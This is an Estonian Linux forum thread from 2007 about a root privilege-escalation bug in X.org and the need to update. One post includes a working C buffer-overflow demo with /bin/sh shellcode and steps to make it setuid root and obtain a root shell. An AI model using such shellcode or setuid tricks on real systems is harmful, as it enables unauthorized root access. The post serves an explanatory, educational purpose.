Portaal Portaal Pingviini veeb foorumi pealeht
  Viki  |  IRC  |  Otsing  |  Küsimused ja vastused  |  Profiil  |  Privaatsõnumite vaatamiseks logi sisse  | Logi sisse või Registreeru
<empty>
Vaata järgmist teemat
Vaata eelmist teemat

Postita uus teemaVasta teemale
Autor Sõnum
spott
Admin
Admin


Vanus: 43
Liitunud: 04.06.2005
Postitused: 8857

Distributsioon: Ubuntu
estonia.gif
postituspostitatud: 10.01.2007, 21:27  postituse pealkiri:  Viga X.org serveris  

On leitud ohtlik viga erinevates X.org serverites, mis võimaldavad X serverile ligi pääsedes võtta endale root kasutaja õigused. Kuna mitmel puhul on tegu väga lihtsa nipiga, kuidas seda teha, siis on kiiresti välja lastud ka vastavad parandused. Ohustatud on kõik X.org serveri versioonid. Erinevad distributsioonid on alustanud juba uuendatud pakettide välja laskmisega. Seega, kui Teie paketihaldur pakub uuendada X-i, siis laske see tal kindlasti teha.
Lähemat infot saate LWN.net vahendusel.

_________________
Tellige endale sünnipäevaks, sõbrapäevaks või muuks tähtpäevaks kingitus: Kingitused internetist - NetiKink.eu

uniz
Vana Pingviin
Vana Pingviin


Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare
estonia.gif
postituspostitatud: 10.01.2007, 21:33  postituse pealkiri:  (teema puudub)  

Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..


HoHo
Vana Pingviin
Vana Pingviin


Vanus: 39
Liitunud: 08.07.2005
Postitused: 527
Asukoht: Tallinn/Paide
Distributsioon: Gentoo
estonia.gif
postituspostitatud: 10.01.2007, 23:08  postituse pealkiri:  (teema puudub)  

Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.


taavi
Pingviini kasutaja
Pingviini kasutaja



Liitunud: 25.07.2005
Postitused: 59

Distributsioon: Arch, Debian
blank.gif
postituspostitatud: 10.01.2007, 23:37  postituse pealkiri:  (teema puudub)  

uniz kirjutas:
Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..


Kas sa oled irooniline või täielik ignorant?


johnsmith
Vana Pingviin
Vana Pingviin


Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
finland.gif
postituspostitatud: 11.01.2007, 00:12  postituse pealkiri:  (teema puudub)  

Kõigepealt pead kasutajana sisse logima ja siis käivitad mingi legaalse programmi millele antakse valed parameetrid ja mille keegi assemblerit tundev koll on valmis meisterdanud.
Seal peavad mingid lisa moodulid olema ka asendatud.

Nende kõikide probleemide ema on setuid ja setgid õigusi omavad programmid.
Need programmid on tehtud, et kasutaja saaks käivitada mingi teenuse mis nõuab juure õigusi kuid olles sisse loginud tavakasutajana.
Selle asemel aga, et käivitada legaalne teenus kirjutab pätt programm puskurist üle ja käivitatakse hoopis shell juure õigustega.

Proovi ise
Kood:

#include <stdio.h>
#include <string.h>
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];

int main(int argc, char **argv){
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;
    for (i = 0; i < (int) strlen(shellcode); i++)
        large_string[i] = shellcode[i];
    strcpy(buffer, large_string);
    return 0;
}


Kompileeri see ja su rootiks
chown root.root objektfile
chmod u+s objektfile
nüüd tagasi tavakasutajaks ja käivita see programm:
whoami ?

Tehnika on sama olenemata mis meetodit kasutatakse.


Soovitav on sellele programmile kinga anda pärast proovimist Smile

_________________
"Thinking is the hardest work there is, which is probably the reason why so few engage in it" - Henry Ford

uniz
Vana Pingviin
Vana Pingviin


Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare
estonia.gif
postituspostitatud: 11.01.2007, 08:08  postituse pealkiri:  (teema puudub)  

HoHo kirjutas:
Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.


Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..


priit
Vana Pingviin
Vana Pingviin


Vanus: 40
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X
estonia.gif
postituspostitatud: 11.01.2007, 11:46  postituse pealkiri:  (teema puudub)  

uniz kirjutas:
HoHo kirjutas:
Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.


Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..


Ma ei tea nüüd, mul oli pikka aega Windows 98 arvutis, nuhkvara küll ei olnud...


uniz
Vana Pingviin
Vana Pingviin


Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare
estonia.gif
postituspostitatud: 11.01.2007, 13:20  postituse pealkiri:  (teema puudub)  

Miks sa siis debiani kasutad?


priit
Vana Pingviin
Vana Pingviin


Vanus: 40
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X
estonia.gif
postituspostitatud: 11.01.2007, 13:24  postituse pealkiri:  (teema puudub)  

Sest mulle meeldib.
St mulle meeldivad alternatiivid, seda nii Linuxi, SkyOSi, BeOSi, Haiku, QNXi jmt näol. Kõiki olen kasutanud/katsetanud ja kavatsen ka edaspidi seda teha.


Näita (aja järgi):      
Postita uus teemaVasta teemale


Vaata järgmist teemat
Vaata eelmist teemat
Powered by phpBB2 Plus based on phpBB © 2001/7 phpBB Group